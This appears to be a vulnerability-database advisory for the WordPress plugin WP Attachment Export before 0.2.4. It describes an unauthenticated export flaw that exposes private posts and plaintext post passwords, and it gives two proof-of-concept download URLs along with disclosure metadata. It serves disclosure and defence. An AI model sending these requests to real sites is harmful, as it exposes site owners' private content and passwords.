WordPress Plugin Vulnerabilities
WP Attachment Export < 0.2.4 - Unauthenticated Posts Download
Description
The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress
powered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.
Proof of Concept
Download attachment details: http://localhost/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true Download Wordpress content details: http://localhost/wp-admin/tools.php?content=&wp-attachment-export-download=true
Affects Plugins
References
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Nitin Venkatesh
Submitter
ethicalhack3r
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2015-07-15 (about 8 years ago)
Added
2015-07-15 (about 8 years ago)
Last Updated
2022-04-08 (about 2 years ago)